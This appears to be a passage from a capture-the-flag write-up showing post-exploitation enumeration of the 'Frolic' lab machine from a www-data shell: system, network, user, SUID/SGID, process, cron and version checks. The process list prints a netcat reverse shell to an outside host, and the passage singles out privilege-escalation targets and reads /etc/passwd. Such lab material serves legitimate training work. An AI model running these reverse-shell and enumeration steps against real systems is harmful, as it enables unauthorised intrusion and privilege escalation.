System/Kernel
www-data@frolic:~/html/playsms$ file /bin/bash ; uname -a ; cat /etc/*release
/bin/bash: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=1d878a5214eef416ceb5ee0c4f537fb9b417daf8, stripped
linux frolic 4.4.0-116-generic #140-ubuntu smp mon feb 12 21:22:43 UTC 2018 i686 i686 i686 GNU/Linux
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"
NAME="Ubuntu"
VERSION="16.04.4 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.4 LTS"
VERSION_ID="16.04"
home_url="http://www.ubuntu.com/"
support_url="http://help.ubuntu.com/"
bug_report_url="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenialUbuntu 16.04.4 LTS (Xenial Xerus)
4.4.0-116-generic
i686
Networks
www-data@frolic:~/html/playsms$ arp -a ; netstat -antup4
? (10.10.10.2) at 00:50:56:b9:d7:84 [ether] on ens33
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9999 0.0.0.0:* LISTEN 1176/nginx: worker
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:1880 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 360 10.10.10.111:52360 10.10.16.8:9999 ESTABLISHED 2726/nc
udp 0 0 10.10.10.255:137 0.0.0.0:* -
udp 0 0 10.10.10.111:137 0.0.0.0:* -
udp 0 0 0.0.0.0:137 0.0.0.0:* -
udp 0 0 10.10.10.255:138 0.0.0.0:* -
udp 0 0 10.10.10.111:138 0.0.0.0:* -
udp 0 0 0.0.0.0:138 0.0.0.0:* - 127.0.0.1:3306
Users & Groups
www-data@frolic:~/html/playsms$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
sahay:x:1000:1000:Ayush Sahay,,,:/home/sahay:/bin/bash
ayush:x:1001:1001:,,,:/home/ayush:/bin/bash
total 16K
4.0K drwxr-xr-x 3 ayush ayush 4.0K Sep 9 2022 ayush
4.0K drwxr-xr-x 7 sahay sahay 4.0K Sep 9 2022 sahay
4.0K drwxr-xr-x 4 root root 4.0K Sep 9 2022 .
4.0K drwxr-xr-x 22 root root 4.0K Sep 9 2022 ..ayush
sahay
www-data@frolic:~/html/playsms$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(mysql) gid=111(mysql) groups=111(mysql)
uid=108(messagebus) gid=112(messagebus) groups=112(messagebus)
uid=109(uuidd) gid=113(uuidd) groups=113(uuidd)
uid=110(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=111(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(sahay) gid=1000(sahay) groups=1000(sahay),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),114(sambashare),119(lpadmin)
uid=1001(ayush) gid=1001(ayush) groups=1001(ayush)uid=1000(sahay) gid=1000(sahay) groups=1000(sahay),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),114(sambashare),119(lpadmin)
uid=1001(ayush) gid=1001(ayush) groups=1001(ayush)
SUIDs
www-data@frolic:~/html/playsms$ find / -perm -04000 -ls -type f 2>/dev/null
15627 40 -rwsr-xr-x 1 root root 38660 Mar 6 2017 /sbin/mount.cifs
51030 36 -rwsr-xr-x 1 root root 34812 Dec 1 2017 /bin/mount
51045 44 -rwsr-xr-x 1 root root 43316 May 8 2014 /bin/ping6
62169 32 -rwsr-xr-x 1 root root 30112 Jul 12 2016 /bin/fusermount
51044 40 -rwsr-xr-x 1 root root 38932 May 8 2014 /bin/ping
51079 28 -rwsr-xr-x 1 root root 26492 Dec 1 2017 /bin/umount
51061 40 -rwsr-xr-x 1 root root 38900 May 17 2017 /bin/su
62179 156 -rwsr-xr-x 1 root root 157424 Jan 28 2017 /bin/ntfs-3g
77450 8 -rwsr-xr-x 1 root root 7480 Sep 25 2018 /home/ayush/.binary/rop
301 52 -rwsr-xr-x 1 root root 53128 May 17 2017 /usr/bin/passwd
226 80 -rwsr-xr-x 1 root root 78012 May 17 2017 /usr/bin/gpasswd
290 36 -rwsr-xr-x 1 root root 34680 May 17 2017 /usr/bin/newgrp
14022 36 -rwsr-xr-x 1 root root 36288 May 17 2017 /usr/bin/newuidmap
16197 20 -rwsr-xr-x 1 root root 18216 Jan 18 2016 /usr/bin/pkexec
15450 52 -rwsr-sr-x 1 daemon daemon 50748 Jan 15 2016 /usr/bin/at
385 160 -rwsr-xr-x 1 root root 159852 Jul 4 2017 /usr/bin/sudo
14023 36 -rwsr-xr-x 1 root root 36288 May 17 2017 /usr/bin/newgidmap
165 40 -rwsr-xr-x 1 root root 39560 May 17 2017 /usr/bin/chsh
163 48 -rwsr-xr-x 1 root root 48264 May 17 2017 /usr/bin/chfn
16188 16 -rwsr-xr-x 1 root root 13960 Jan 18 2016 /usr/lib/policykit-1/polkit-agent-helper-1
147447 92 -rwsr-sr-x 1 root root 92556 Dec 1 2017 /usr/lib/snapd/snap-confine
485 8 -rwsr-xr-x 1 root root 5480 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
13959 44 -rwsr-xr-x 1 root root 42396 Jun 15 2017 /usr/lib/i386-linux-gnu/lxc/lxc-user-nic
12161 48 -rwsr-xr-- 1 root messagebus 46436 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
15154 504 -rwsr-xr-x 1 root root 513528 Jan 18 2018 /usr/lib/openssh/ssh-keysign/home/ayush/.binary/rop
/usr/bin/pkexec
SGIDs
www-data@frolic:~/html/playsms$ find / -perm -02000 -ls -type f 2>/dev/null
300 0 drwxr-sr-x 3 root systemd-journal 60 oct 11 11:01 /run/log/journal
301 0 drwxr-s--- 2 root systemd-journal 100 oct 11 11:01 /run/log/journal/b0fd78472dc6fd253ad4660b5ba74f9d
126 40 -rwxr-sr-x 1 root shadow 38664 Mar 16 2016 /sbin/unix_chkpwd
90 40 -rwxr-sr-x 1 root shadow 38684 Mar 16 2016 /sbin/pam_extrausers_chkpwd
33423 4 drwxr-sr-x 2 man root 4096 Sep 9 2022 /var/cache/man
21760 4 drwxrwsr-x 2 root staff 4096 Sep 9 2022 /var/local
21776 4 drwxrwsr-x 2 root mail 4096 Sep 9 2022 /var/mail
160 60 -rwxr-sr-x 1 root shadow 61276 May 17 2017 /usr/bin/chage
12758 12 -rwxr-sr-x 1 root tty 9788 Mar 1 2016 /usr/bin/bsd-write
15500 456 -rwxr-sr-x 1 root utmp 464152 Feb 7 2016 /usr/bin/screen
15146 36 -rwxr-sr-x 1 root mlocate 34452 Nov 18 2014 /usr/bin/mlocate
211 24 -rwxr-sr-x 1 root shadow 22000 May 17 2017 /usr/bin/expiry
15450 52 -rwsr-sr-x 1 daemon daemon 50748 Jan 15 2016 /usr/bin/at
174 40 -rwxr-sr-x 1 root crontab 38996 Apr 6 2016 /usr/bin/crontab
15157 424 -rwxr-sr-x 1 root ssh 431632 Jan 18 2018 /usr/bin/ssh-agent
438 28 -rwxr-sr-x 1 root tty 26356 Dec 1 2017 /usr/bin/wall
24771 4 drwxrwsr-x 2 root staff 4096 Sep 23 2018 /usr/local/share/fonts
148689 4 drwxrwsr-x 7 root staff 4096 Sep 23 2018 /usr/local/share/sgml
148692 4 drwxrwsr-x 2 root staff 4096 Sep 23 2018 /usr/local/share/sgml/entities
148694 4 drwxrwsr-x 2 root staff 4096 Sep 23 2018 /usr/local/share/sgml/dtd
148693 4 drwxrwsr-x 2 root staff 4096 Sep 23 2018 /usr/local/share/sgml/misc
148690 4 drwxrwsr-x 2 root staff 4096 Sep 23 2018 /usr/local/share/sgml/declaration
148691 4 drwxrwsr-x 2 root staff 4096 Sep 23 2018 /usr/local/share/sgml/stylesheet
149126 4 drwxrwsr-x 6 root staff 4096 Sep 23 2018 /usr/local/share/xml
149129 4 drwxrwsr-x 2 root staff 4096 Sep 23 2018 /usr/local/share/xml/entities
149127 4 drwxrwsr-x 2 root staff 4096 Sep 23 2018 /usr/local/share/xml/misc
149128 4 drwxrwsr-x 2 root staff 4096 Sep 23 2018 /usr/local/share/xml/declaration
149130 4 drwxrwsr-x 2 root staff 4096 Sep 23 2018 /usr/local/share/xml/schema
11821 4 drwxrwsr-x 4 root staff 4096 Sep 9 2022 /usr/local/lib/python2.7
11822 4 drwxrwsr-x 2 root staff 4096 Sep 23 2018 /usr/local/lib/python2.7/dist-packages
34589 4 drwxrwsr-x 2 root staff 4096 Sep 9 2022 /usr/local/lib/python2.7/site-packages
3136 4 drwxrwsr-x 3 root staff 4096 Sep 23 2018 /usr/local/lib/python3.5
3137 4 drwxrwsr-x 2 root staff 4096 Feb 28 2018 /usr/local/lib/python3.5/dist-packages
147447 92 -rwsr-sr-x 1 root root 92556 Dec 1 2017 /usr/lib/snapd/snap-confine
15496 8 -rwxr-sr-x 1 root utmp 5480 Mar 11 2016 /usr/lib/i386-linux-gnu/utempter/utempterProcesses
www-data@frolic:~/html/playsms$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.4 6688 5112 ? Ss 11:01 0:03 /sbin/init
root 390 0.0 0.2 5744 2776 ? Ss 11:01 0:00 /lib/systemd/systemd-journald
root 411 0.0 0.1 13280 1428 ? Ss 11:01 0:00 /sbin/lvmetad -f
root 429 0.0 0.3 13980 3408 ? Ss 11:01 0:00 /lib/systemd/systemd-udevd
systemd+ 706 0.0 0.2 12596 2180 ? Ssl 11:01 0:01 /lib/systemd/systemd-timesyncd
root 806 0.1 0.8 42912 8544 ? Ss 11:01 0:11 /usr/bin/vmtoolsd
root 807 0.0 0.1 3796 1076 ? Ss 11:01 0:00 /lib/systemd/systemd-logind
daemon 808 0.0 0.2 3480 2064 ? Ss 11:01 0:00 /usr/sbin/atd -f
root 809 0.0 0.5 37664 5560 ? Ssl 11:01 0:00 /usr/lib/accountsservice/accounts-daemon
root 810 0.0 0.5 88808 5612 ? Ssl 11:01 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
syslog 811 0.0 0.2 30728 2888 ? Ssl 11:01 0:00 /usr/sbin/rsyslogd -n
message+ 813 0.0 0.3 5932 3384 ? Ss 11:01 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 860 0.0 0.1 2244 1040 ? Ss 11:01 0:00 /usr/sbin/acpid
root 862 0.0 0.2 5576 2524 ? Ss 11:01 0:00 /usr/sbin/cron -f
root 863 0.0 1.6 852912 16676 ? Ssl 11:01 0:00 /usr/lib/snapd/snapd
root 876 0.0 0.7 35764 7352 ? Ssl 11:01 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 879 0.0 0.0 3132 104 ? Ss 11:01 0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root 1017 0.0 0.5 9996 5284 ? Ss 11:01 0:00 /usr/sbin/sshd -D
sahay 1025 0.0 4.9 174736 50460 ? Ssl 11:01 0:05 node-red
root 1066 0.0 0.0 2984 112 ? Ss 11:01 0:00 /sbin/iscsid
root 1067 0.0 0.2 3444 2916 ? S<Ls 11:01 0:02 /sbin/iscsid
mysql 1131 0.8 14.7 550660 151100 ? Ssl 11:01 1:36 /usr/sbin/mysqld
root 1173 0.0 0.0 45932 944 ? Ss 11:01 0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
www-data 1176 2.2 0.4 46456 4432 ? S 11:01 4:03 nginx: worker process
root 1197 0.0 2.4 128856 24704 ? Ss 11:01 0:00 php-fpm: master process (/etc/php/7.0/fpm/php-fpm.conf)
www-data 1227 0.0 1.7 129356 17408 ? S 11:01 0:02 php-fpm: pool www
www-data 1228 0.0 1.5 129284 16156 ? S 11:01 0:01 php-fpm: pool www
root 1279 0.0 0.4 25784 5028 ? Ss 11:01 0:00 /usr/sbin/nmbd -D
root 1369 0.0 0.7 32728 7676 ? Ss 11:01 0:00 /usr/sbin/winbindd
root 1370 0.0 0.9 32884 10228 ? S 11:01 0:00 /usr/sbin/winbindd
root 1381 0.0 1.3 42312 13824 ? Ss 11:01 0:00 /usr/sbin/smbd -D
root 1382 0.0 0.3 40468 3548 ? S 11:01 0:00 /usr/sbin/smbd -D
root 1385 0.0 0.6 32728 6964 ? S 11:01 0:00 /usr/sbin/winbindd
root 1386 0.0 0.5 32728 5992 ? S 11:01 0:00 /usr/sbin/winbindd
root 1387 0.0 0.5 42312 5728 ? S 11:01 0:00 /usr/sbin/smbd -D
root 1390 0.2 1.8 64920 19080 ? S 11:01 0:32 /usr/bin/php -q /usr/local/bin/playsmsd /etc/playsmsd.conf schedule
root 1392 0.2 1.8 64920 19272 ? S 11:01 0:31 /usr/bin/php -q /usr/local/bin/playsmsd /etc/playsmsd.conf ratesmsd
root 1394 0.3 1.8 64920 19292 ? S 11:01 0:33 /usr/bin/php -q /usr/local/bin/playsmsd /etc/playsmsd.conf dlrssmsd
root 1396 0.2 1.9 64920 19472 ? S 11:01 0:32 /usr/bin/php -q /usr/local/bin/playsmsd /etc/playsmsd.conf recvsmsd
root 1398 0.2 1.8 64920 19404 ? S 11:01 0:32 /usr/bin/php -q /usr/local/bin/playsmsd /etc/playsmsd.conf sendsmsd
root 1504 0.0 0.1 4748 1428 tty1 Ss+ 11:01 0:00 /sbin/agetty --noclear tty1 linux
www-data 2724 0.0 0.0 2368 496 ? S 13:46 0:00 sh -c mkfifo /tmp/vdma; nc 10.10.16.8 9999 0</tmp/vdma | /bin/sh >/tmp/vdma 2>&1; rm /tmp/vdma
www-data 2726 0.0 0.1 2764 1648 ? S 13:46 0:00 nc 10.10.16.8 9999
www-data 2727 0.0 0.0 2368 496 ? S 13:46 0:00 /bin/sh
www-data 2731 0.0 0.1 2664 1540 ? S 13:50 0:00 script /dev/null -c bash
www-data 2732 0.0 0.0 2368 496 pts/0 Ss 13:50 0:00 sh -c bash
www-data 2733 0.0 0.2 3768 2576 pts/0 S 13:50 0:00 bash
www-data 2740 0.0 1.4 129284 15044 ? S 13:51 0:00 php-fpm: pool www
www-data 2817 0.0 0.2 5676 2756 pts/0 R+ 14:02 0:00 ps -auxwww/usr/sbin/cron -f
/usr/lib/policykit-1/polkitd --no-debug
node-red
/usr/sbin/smbd -D
Cron & Systemd
www-data@frolic:~/html/playsms$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for www-data
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
path=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT LEFT LAST PASSED
wed 2023-10-11 15:18:11 IST 1h 13min left Wed 2023-10-11 11:01:12 IST 3h 3min
wed 2023-10-11 20:16:14 IST 6h left Wed 2023-10-11 11:01:12 IST 3h 3min
thu 2023-10-12 06:44:19 IST 16h left Wed 2023-10-11 11:01:12 IST 3h 3min
thu 2023-10-12 11:16:06 IST 21h left Wed 2023-10-11 11:16:06 IST 2h 49min
4 timers listed.
Pass --all to see loaded but inactive timers, too.
lines 1-8/8 (END)Sudo Version
www-data@frolic:~/html/playsms$ sudo --version
Sudo version 1.8.16
Sudoers policy plugin version 1.8.16
Sudoers file grammar version 45
Sudoers I/O plugin version 1.8.16Sudo version 1.8.16
Glibc Version
www-data@frolic:~/html/playsms$ ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu10) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.ldd (Ubuntu GLIBC 2.23-0ubuntu10) 2.23